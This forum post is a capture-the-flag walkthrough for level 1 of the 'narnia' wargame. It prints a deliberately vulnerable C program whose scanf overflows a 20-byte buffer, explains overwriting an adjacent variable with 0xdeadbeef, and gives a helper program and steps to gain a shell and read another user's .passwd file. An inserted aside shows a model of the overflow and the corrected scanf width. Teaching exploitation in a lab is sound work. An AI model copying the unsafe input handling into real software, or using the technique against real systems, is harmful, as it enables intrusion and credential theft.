ORIGINALLY POSTED BY OUTERLIMIT FOR THETAZZONE/TAZFORUM HERE

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post…we do not sell, publish, transmit, or have the right to give permission for such…TheTAZZone merely retains the right to use, retain, and publish submitted work within its Network


This is related to the wargames Harry posted…
It is for the server narnia. http://www.intruded.net/narnia.html
The objective on this box is to look at the source code to the program for the level you are on, and find a way to exploit or accomplish what it asks.

This is my solution and explanation of level1.

Once you log in:
cd /wargame

The program you are trying to use is level1; its source code is level1.c

[code]#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    /* the level's intended flaw: width 24 into a 20-byte buffer */
    scanf("%24s",&buf);

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef){
        seteuid(1002);
        system("/bin/sh");
    } else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}[/code]

Looking at this code, they want you to change val’s value from 0x41414141 to 0xdeadbeef.
Also, if you notice, it prompts you for input and stores it in the variable buf, and then prints out val…
The variable buf is declared as an array with 20 elements, and since nothing keeps the input within those 20 bytes (the scanf format accepts up to 24 characters), it allows for a buffer overflow.

You can play around with this by entering inputs of varying lengths.
You should notice that anything less than 20 characters does not affect the value of val, but if you input something more than 20 characters, the value of val changes.

This is how you are going to accomplish changing the value to 0xdeadbeef.

You can figure out how what you enter affects the value by entering 000000000000000000000 (21 0’s).
Your output becomes 0x41410030
By inputting 20 0’s followed by a single different character you can see how the value changes.
Closer inspection shows that the last two digits are the ASCII value of the key you entered.
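Why 21 characters change val while a tighter field width cannot, as an added example that is not part of the original post: a small C model of the two locals, contrasting the `%24s` width from level1.c with a width of `sizeof(buf) - 1`. It assumes val sits directly after buf and a little-endian machine; the struct `frame` and the function `val_after_read` are hypothetical names.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 20

/* Hypothetical model of level1's locals: val placed right after buf.
   Real stack layout is compiler-dependent; the struct pins it for the demo. */
struct frame {
    char     buf[BUF_LEN];
    uint32_t val;
};

/* Mimics scanf("%<width>s"): stores up to `width` non-space characters and
   then a terminating NUL, starting at buf. Writes go through a byte pointer
   to the whole struct, so spilling into val is well-defined in this model. */
uint32_t val_after_read(const char *input, size_t width)
{
    struct frame f;
    unsigned char *raw = (unsigned char *)&f;
    size_t n = 0;

    memset(&f, 0, sizeof f);
    f.val = 0x41414141;

    while (n < width && input[n] != '\0' && !isspace((unsigned char)input[n])) {
        if (n < sizeof f)               /* never write outside the model */
            raw[n] = (unsigned char)input[n];
        n++;
    }
    if (n < sizeof f)
        raw[n] = '\0';                  /* the terminator scanf appends */
    return f.val;
}

int main(void)
{
    /* Constructed sample input: 21 '0' characters, as in the text. */
    const char *in21 = "0000000000" "0000000000" "0";

    /* Width 24, as in level1.c: four bytes more than buf can hold. */
    printf("%%24s -> val: 0x%08x\n", (unsigned)val_after_read(in21, 24));
    /* Width BUF_LEN - 1 keeps the data and its NUL inside buf. */
    printf("%%19s -> val: 0x%08x\n", (unsigned)val_after_read(in21, BUF_LEN - 1));
    return 0;
}
```

The corrected call in level1.c would be `scanf("%19s", buf)`, which leaves room for the terminator inside the 20-byte array.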

So basically what you have to do is enter 20 0’s, and then whatever characters produce the ASCII values you need…
If you look at an ASCII table, these are not standard letters on your keyboard… Some of them aren’t even documented.

So what I did was write a C++ program to print out each character for me…
[code]#include <iostream>
using namespace std;

int main(int argc, char* argv[])
{
    unsigned long target = 0xdeadbeef;
    // view target's bytes through a char pointer
    char *p = (char *) &target;
    // print the first 4 bytes in the order they sit in memory
    for (int i = 0; i < 4; i++) {
        cout << p[i];
    }
    return 0;
}[/code]

This program will print out the characters you need to use after the 20 0’s in order to pass the level and replace val with 0xdeadbeef.

In order to get the 4 characters we need, we use a char pointer. A char is stored as 1 byte in memory. 0xdeadbeef is stored as 4 consecutive bytes.
We need the char pointer to point to the first byte of 0xdeadbeef.
This is done by setting our pointer equal to the address of target…
[code] char *p = &target;[/code]
However, the compiler does not like that because target is a long integer, not a character.
So we must type cast the address of target to a char pointer.
[code] char *p = (char *) &target;[/code]
Now, p points to the beginning of target… we know that it is 4 bytes long, so we need to print 4 characters.
C++ will let you use a pointer as an array; each next element of the array increases the address by the size of the type the pointer points to.
In the case of a char pointer, it increments by 1 byte each time.

So following the for loop we will print p[0], p[1], p[2], p[3].
Those are the 4 characters needed in the first program to set val equal to 0xdeadbeef.

In order to run the program you can do this:
Copy the code
Type this: cat > /tmp/lvl1.cpp
Paste the code
Press Ctrl+D
Type this: g++ -o /tmp/lvl1 /tmp/lvl1.cpp
chmod +x /tmp/lvl1
/tmp/lvl1

Now copy the 4 characters

Then run /wargame/level1
Type in 20 0’s, and paste those characters.

Now you should have a new shell as level2
cat /home/level2/.passwd

Continue on to level2

Good luck!

By admin
